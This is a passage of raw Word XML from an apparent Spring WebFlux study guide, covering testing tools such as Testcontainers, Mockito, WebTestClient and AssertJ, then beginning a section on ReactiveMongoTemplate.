    <w:p w14:paraId="3BACC47C"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6DFA96AC"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41732538" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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5. Testcontainers (For Integration Testing with Databases)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79679BFF"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estcontainers is a popular library for testing with Docker containers. It’s commonly used to test database connections by spinning up containers for databases like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoDB</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Redis</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PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a test environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D890DB" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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Key Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D39E7EB"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upports creating Docker containers for databases and other services in tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0182EB5B"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nsures you have an isolated environment for integration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168BB264"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sed for testing real database interactions without needing to set up a local database instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08475FE1" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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 Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3535E689"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estcontainers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD9E2E8"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public class ItemRepositoryTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E2CB44" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B9CBE00"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Container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2731FF16"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static MongoDBContainer mongoDBContainer = new MongoDBContainer("mongo:4.0.10");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4413B6D9" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435A8417"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028A375B"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ItemRepository itemRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7A5F1A" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="709F0F08"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2110ABA5"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void testRepositoryMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1795AC57"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Test with real MongoDB instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64013F73"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1EEC014F"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5EFB0811" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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6. Mockito for Mocking Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F71623E"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ockito can be used to mock the service or repository layer when testing controllers or services. It allows you to define how mocked services should behave when invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD2DE36" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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 Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A3707F"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ockBean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F786D"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rivate ItemService itemService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425BC198" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="551EAF72"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153D9058"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void testGetItemById() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D730F8"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hen(itemService.getItemById("1")).thenReturn(Mono.just(new Item("1", "Test Item", 100.0)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7E925A" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C17511"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Test with WebTestClient or service method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B4D602"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5582D37B" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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7. Integration Tests (Using @SpringBootTest)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F7FDD6"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or full integration tests, you can use @SpringBootTest along with @AutoConfigureWebTestClient. This allows you to test the entire application context and verify that the application works correctly with real HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D1C0A7" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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Key Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D88C35"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ests the full Spring context, including the web layer, service layer, and repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25876FF3"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seful for end-to-end testing where real interactions with the application are required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DE7493"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Can be used with real data and external services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2B0731" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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 Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BFA9D5"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BootTest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E331B5"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utoConfigureWebTestClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF6EB15"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IntegrationTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A56810" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6195E2B6"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E274319"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WebTestClient webTestClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5345EDE6" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CC465E6"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5585FE1F"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void testGetItem() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1072D5BD"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ebTestClient.get().uri("/api/items/1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207E6B69"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change()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEB5404"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pectStatus().isOk()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B02F21F"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pectBody()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0F72D8"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jsonPath("$.id").isEqualTo("1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB58B4E"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jsonPath("$.name").isEqualTo("Test Item");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AE0A13"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6CC55377"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691FF0E4" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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8. Reactor Debugging Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096953FE"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Reactor provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>debugging tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactor.core.publisher.Flux#log()</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Mono#log()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for logging the behavior of reactive streams. These can be helpful during development and testing to track the flow of data and diagnose issues in reactive pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C7DFBD" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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 Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DF0C70"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Mono.just("test")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ECCFB3"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log() // Logs the lifecycle of the Mono</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E8C38B"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doOnNext(data -&gt; System.out.println("Received: " + data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A28A35"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ubscribe();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9CDD82" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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9. Custom Assertions with assertThat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEA9E4A"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For more flexible assertions, you can use libraries like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AssertJ</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Hamcrest</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. You can assert that a Mono or Flux emits the expected values, or you can combine it with StepVerifier for more complex checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C76375" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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 Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213F72E5"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A278A8B"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void testFlux() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FAB7AE"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Flux&lt;Item&gt; itemFlux = itemService.getAllItems();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22658F77"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assertThat(itemFlux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3D8872"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hasSize(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA84A71"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extracting(Item::getName)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3CA066"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contains("Item 1", "Item 2", "Item 3");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E2509B"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7C3B2531" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0"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Strategies for Testing Reactive Endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040ED5AC"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Test Asynchronous Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that asynchronous behavior doesn't block or freeze the tests. Use StepVerifier to handle assertions on Mono or Flux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4827C72E"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rror Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Test how reactive streams react to errors (e.g., onErrorReturn, onErrorResume). Verify that the correct error handling mechanism is triggered in the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3911032F"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Mocking External Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use @MockBean for mocking external service calls to isolate the web layer from the actual service logic during testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB3E2E3"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Test Endpoints with WebTestClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that your endpoints behave correctly in terms of status codes, headers, and bodies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C13FCDF"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Backpressure Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Test how backpressure is managed in your reactive streams and how the system handles situations where consumers cannot keep up with producers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D8F21F"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Integration Testing with Real Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use integration tests to test your application end-to-end, including database and external API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECD5386" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0"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By leveraging these tools and strategies, you can ensure that your reactive endpoints in Spring WebFlux are well-tested, performant, and robust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A48C74"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B474D4E">
          <v:rect id="_x0000_i2331" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ACED6B" w14:textId="1432DE27"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28" w:name="_Toc196308008"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of ReactiveMongoTemplate in Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="528"/>
    </w:p>
    <w:p w14:paraId="2CBD6E50" w14:textId="51F5B6D1" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D"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ReactiveMongoTemplate in </w:t>
      </w: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xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> alternative to the traditional MongoTemplate in Spring Data MongoDB. It is used for interacting with MongoDB in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</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asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> manner. This is particularly useful in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where you want to take advantage of the reactive programming model provided by Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DABB4" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D"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Key Uses of ReactiveMongoTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF124E2"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Non-blocking Database Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0020BBC3" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D"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t provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> database operations, which helps in handling a large number of concurrent requests efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CFCA29" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D"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nlike the traditional blocking MongoTemplate, ReactiveMongoTemplate allows database operations to run in the background without blocking the thread, allowing other tasks to proceed while waiting for the database operation to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788B41B6"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upport for Reactive Types (Mono, Flux):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1164E1E3" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D"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t returns </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive types</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like Mono and Flux, which are key components of reactive programming in Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663A81FA" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D" w:rsidP="00B13F85">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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ono: Represents a single value or empty value (a completion signal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D993CB8" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D" w:rsidP="00B13F85">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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lux: Represents a sequence of 0 to N values, providing support for handling streams of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABB4413"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RUD Operations (Create, Read, Update, Delete):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2F4FA9" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D"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You can perform the usual CRUD operations reactively using ReactiveMongoTemplate. These operations will not block the thread and will work efficiently in a non-blocking, asynchronous manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B100087" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D"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or example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF117E1" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D" w:rsidP="00B13F85">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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ind(): Retrieves documents from the MongoDB collection reactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2DEE9A" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D" w:rsidP="00B13F85">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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ave(): Inserts or updates documents in the collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402757F2" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D" w:rsidP="00B13F85">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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move(): Deletes documents from the collection reactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4065BC20"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lastRenderedPageBreak/>
        <w:t>Aggregation Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EEEFF8" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D"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ReactiveMongoTemplate also supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoDB aggregation operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, allowing complex queries to be executed reactively. This includes operations like filtering, grouping, sorting, etc., but in a non-blocking fashion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E78B67C"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ustom Query Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FDB87E" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D"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t allows executing </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Query</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
